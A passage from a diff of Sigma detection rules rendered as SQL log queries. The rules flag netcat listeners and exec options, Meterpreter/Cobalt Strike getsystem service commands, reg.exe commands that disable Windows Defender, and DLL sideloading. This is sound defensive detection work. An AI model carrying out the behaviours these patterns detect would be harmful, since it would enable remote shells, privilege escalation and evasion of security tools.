'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ncat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netcat.exe' 
ESCAPE '\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" ], - "filename": "driver_load_win_mal_poortry_driver.yml" + "filename": "proc_creation_win_pua_netcat.yml" }, { - "title": "Vulnerable GIGABYTE Driver Load", - "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", + "title": "Potential Suspicious Activity Using SeCEdit", + "id": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", "status": "experimental", - "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential suspicious behaviour using secedit.exe. 
Such as exporting or modifying the security policy", + "author": "Janantha Marasinghe", "tags": [ + "attack.discovery", + "attack.persistence", + "attack.defense_evasion", + "attack.credential_access", "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1562.002", + "attack.t1547.001", + "attack.t1505.005", + "attack.t1556.002", + "attack.t1562", + "attack.t1574.007", + "attack.t1564.002", + "attack.t1546.008", + "attack.t1546.007", + "attack.t1547.014", + "attack.t1547.010", + "attack.t1547.002", + "attack.t1557", + "attack.t1082" ], "falsepositives": [ - "Unknown" + "Legitimate administrative use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN ('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\secedit.exe' ESCAPE '\\' OR OriginalFileName = 'SeCEdit') AND ((CommandLine LIKE '%/export%' ESCAPE '\\' AND CommandLine LIKE '%/cfg%' ESCAPE '\\') OR (CommandLine LIKE '%/configure%' ESCAPE '\\' AND CommandLine LIKE '%/db%' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_gigabyte_driver.yml" + "filename": "proc_creation_win_secedit_execution.yml" }, { - 
"title": "Suspicious Driver Load from Temp", - "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", + "title": "Potential Meterpreter/CobaltStrike Activity", + "id": "15619216-e993-4721-b590-4c520615a67d", "status": "test", - "description": "Detects a driver load from a temporary directory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.persistence", "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "There is a relevant set of false positives depending on applications in the environment" + "Commandlines containing components like cmd accidentally", + "Jobs and services started with cmd" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" ], - "filename": "driver_load_win_susp_temp_use.yml" + "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" }, { - "title": "Vulnerable HW Driver Load", - "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", + "title": "Suspicious Subsystem for Linux Bash Execution", + "id": "5edc2273-c26f-406c-83f3-f4d948e740dd", "status": "experimental", - "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege 
escalation", - "author": "Florian Roth (Nextron Systems)", + "description": "Performs execution of specified file, can be used for defensive evasion.", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%bash.exe%' ESCAPE '\\' AND CommandLine LIKE '%-c %' ESCAPE '\\') AND NOT (((ParentCommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files 
(x86)\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\') OR CommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_hw_driver.yml" + "filename": "proc_creation_win_lolbin_bash.yml" }, { - "title": "DLL Sideloading Of DBGHELP.DLL", - "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "title": "Reg Disable Security Service", + "id": "5e95028c-5229-4214-afae-d653d573d0ec", "status": "experimental", - "description": "Detects DLL sideloading of \"dbghelp.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", + "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Unknown", + "Other security solution installers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine 
LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" ], - "filename": "image_load_side_load_dbghelp_dll.yml" + "filename": "proc_creation_win_reg_disable_sec_services.yml" }, { - "title": "Potential System DLL Sideloading From Non System Locations", - "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", - "status": "experimental", - "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Detection of PowerShell Execution via Sqlps.exe", + "id": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", + "status": "test", + "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", + "author": "Agro (@agro_sev) oscd.community", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1127" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLLs mentioned in this rule" + "Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded 
LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded 
